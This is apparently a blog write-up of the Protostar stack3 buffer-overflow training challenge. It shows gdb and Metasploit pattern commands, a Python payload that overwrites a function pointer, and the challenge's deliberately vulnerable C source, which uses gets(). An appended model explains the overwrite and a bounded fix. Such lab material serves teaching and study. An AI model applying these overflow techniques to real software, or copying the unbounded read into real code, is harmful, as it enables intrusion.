Buffer Overflow Examples, Overwriting a function pointer


Another post where I overwrite a variable value which is used as a function pointer. (x32)

Buffer Overflow Examples, Overwriting a function pointer - protostar stack3

Introduction

Hey, I'm back again with another article. Today I'm going to solve protostar stack3, but this time it's going to be a bit different. In the last two articles I solved stack0, stack1 and stack2, and I used the source code of the binaries to identify where the buffer overflow happens and what exploit to use. With stack3 we are given the source code, but we are not going to use it; instead we will use some practical techniques to solve this challenge, because in a real situation we won't have the source of the program, right? Let's see.

If you haven't read my previous articles about buffer overflow, I recommend reading them first.

./Stack3

Let's first look at the program and see what it does.

We don't see any output, so we should give it an argument. We need to confirm that the program is vulnerable to a buffer overflow, so we can pass an argument of 100 chars and see what happens:

    python -c "print 'A'*100" | ./stack3

And we see a segfault, which confirms that a buffer overflow happened. We also see this line: "calling function pointer, jumping to 0x41414141"

So now we have an idea about what's happening here. There's a function pointer that executes a function based on the given memory address of that function. That memory address is stored in a variable, and we can overwrite that variable when we exceed the buffer. We see that the function pointer was calling the address 0x41414141, and 0x41 is the hex of "A". Now we have to do two things. The first is to know where the buffer overflow happens, because here we have given the program an argument of 100 chars but we don't know the exact size of the buffer. The second is to find the memory address of the function that we need to execute. Let's see how to do that.

Finding the size of the buffer

To make things easier I compiled the program on my kali box to start testing there.

Metasploit has two scripts called pattern_create and pattern_offset; you can find them on kali in /usr/share/metasploit-framework/tools/exploit. pattern_create creates a unique string of a defined length, so we will create a pattern of 100 chars:

    ./pattern_create.rb -l 100

Now let's run the program in gdb (I'm using gdb-peda). First we set a breakpoint in main:

    break *main

This makes the program break after the first instruction of the function main(). Then we run the program. It stops at the breakpoint. We do c to make it continue, then pass our argument.

The segfault happens and we see where it happened: 0x63413163. Now we will use pattern_offset to find the location of 0x63413163 in the pattern:

    ./pattern_offset -l 100 -q 63413163

And we get an exact match at offset 64. This means that the buffer size is 64 chars, and after that the overflow happens.

Finding the memory address of the function

If we do info functions from gdb it will list all the functions and their memory addresses; we can also do that with objdump. But what is the function we're looking for?

    info functions

We see a lot of functions, but the most interesting one is called "win". However, the address on my kali box will be different from the address on the protostar machine, so we will return to protostar and use objdump to find it:

    objdump -d stack3

And we got the address 0x08048424.

Applying the exploit

Now we can easily build our exploit. We know that the buffer is 64 chars; after that we can pass the address of the function, and the function pointer will execute it:

    python -c "print 'A'*64 + '\x24\x84\x04\x08'" | ./stack3

And we get the output "code flow changed successfully".

We solved it without the source; now let's look at the source:

    #include <stdlib.h>
    #include <unistd.h>
    #include <stdio.h>
    #include <string.h>

    void win()
    {
      printf("code flow successfully changed\n");
    }

    int main(int argc, char **argv)
    {
      volatile int (*fp)();   /* the function pointer, placed on the stack after the buffer */
      char buffer[64];        /* 64-byte buffer: offset 64 is where the overflow begins */

      fp = 0;

      gets(buffer);           /* unbounded read: longer input overwrites fp (the challenge's bug) */

      if(fp) {
          printf("calling function pointer, jumping to 0x%08x\n", fp);
          fp();
      }
    }

We see the function win() is defined at the top, and after it the function main(), which declares the function pointer and a buffer of 64 chars, then sets the pointer's value to 0. After that it takes our argument and stores it in the buffer. The last thing is an if statement that checks whether the function pointer value has changed from 0, and if so it calls the address of that new value.

That's it, feedback is appreciated!

Don't forget to read the previous articles. Tweet about the article if you liked it, and follow me on twitter @Ahm3d_H3sham.

Thanks for reading.

Previous Binary Exploitation article: Buffer Overflow Examples, Overwriting a variable value on the stack - Protostar Stack1, Stack2

Next Binary Exploitation article: Buffer Overflow Examples, Taking control of the instruction pointer - protostar stack4
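As an added example (not the post's own code), here is a small C model of the stack3 frame described above: a 64-byte buffer followed immediately by the function pointer. It reproduces the two observations from the write-up (100 'A's give 0x41414141, the final input gives 0x08048424) from an unbounded gets()-style copy, and shows that a bounded fgets()-style read leaves fp at 0. The flat-array layout and the function names (fp_after_unbounded_copy, fp_after_bounded_copy, page_payload_fp, probe_payload_fp) are assumptions of the model, not part of the page.

```c
#include <stdint.h>
#include <string.h>

/* Model of stack3's frame as the write-up describes it: a 64-byte buffer with the
 * 4-byte fp right after it (x86, little-endian), as a flat array to avoid UB. */
#define BUF_SIZE   64
#define FRAME_SIZE (BUF_SIZE + 4)

/* Read the fp slot the way a 32-bit little-endian CPU would. */
static uint32_t read_fp(const unsigned char *frame) {
    return (uint32_t)frame[BUF_SIZE]            | (uint32_t)frame[BUF_SIZE + 1] << 8 |
           (uint32_t)frame[BUF_SIZE + 2] << 16 | (uint32_t)frame[BUF_SIZE + 3] << 24;
}

/* gets()-style copy: no bound, so anything past byte 64 lands in fp. */
uint32_t fp_after_unbounded_copy(const unsigned char *input, size_t len) {
    unsigned char frame[FRAME_SIZE];
    memset(frame, 0, sizeof frame);              /* fp = 0, as in stack3's main() */
    if (len > FRAME_SIZE) len = FRAME_SIZE;      /* keep the model array in bounds */
    memcpy(frame, input, len);
    return read_fp(frame);
}

/* fgets(buffer, sizeof buffer, stdin)-style fix: at most 63 bytes plus a NUL. */
uint32_t fp_after_bounded_copy(const unsigned char *input, size_t len) {
    unsigned char frame[FRAME_SIZE];
    memset(frame, 0, sizeof frame);
    if (len > BUF_SIZE - 1) len = BUF_SIZE - 1;
    memcpy(frame, input, len);
    frame[len] = '\0';
    return read_fp(frame);
}

/* The write-up's final input: 64 x 'A' then 0x08048424 as "\x24\x84\x04\x08". */
uint32_t page_payload_fp(int bounded) {
    unsigned char payload[FRAME_SIZE];
    memset(payload, 'A', BUF_SIZE);
    memcpy(payload + BUF_SIZE, "\x24\x84\x04\x08", 4);
    return bounded ? fp_after_bounded_copy(payload, sizeof payload)
                   : fp_after_unbounded_copy(payload, sizeof payload);
}

/* The write-up's first probe: 100 x 'A', which produced "jumping to 0x41414141". */
uint32_t probe_payload_fp(int bounded) {
    unsigned char probe[100];
    memset(probe, 'A', sizeof probe);
    return bounded ? fp_after_bounded_copy(probe, sizeof probe)
                   : fp_after_unbounded_copy(probe, sizeof probe);
}
```

The little-endian byte order is why the address 0x08048424 has to be written as '\x24\x84\x04\x08' in the input.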


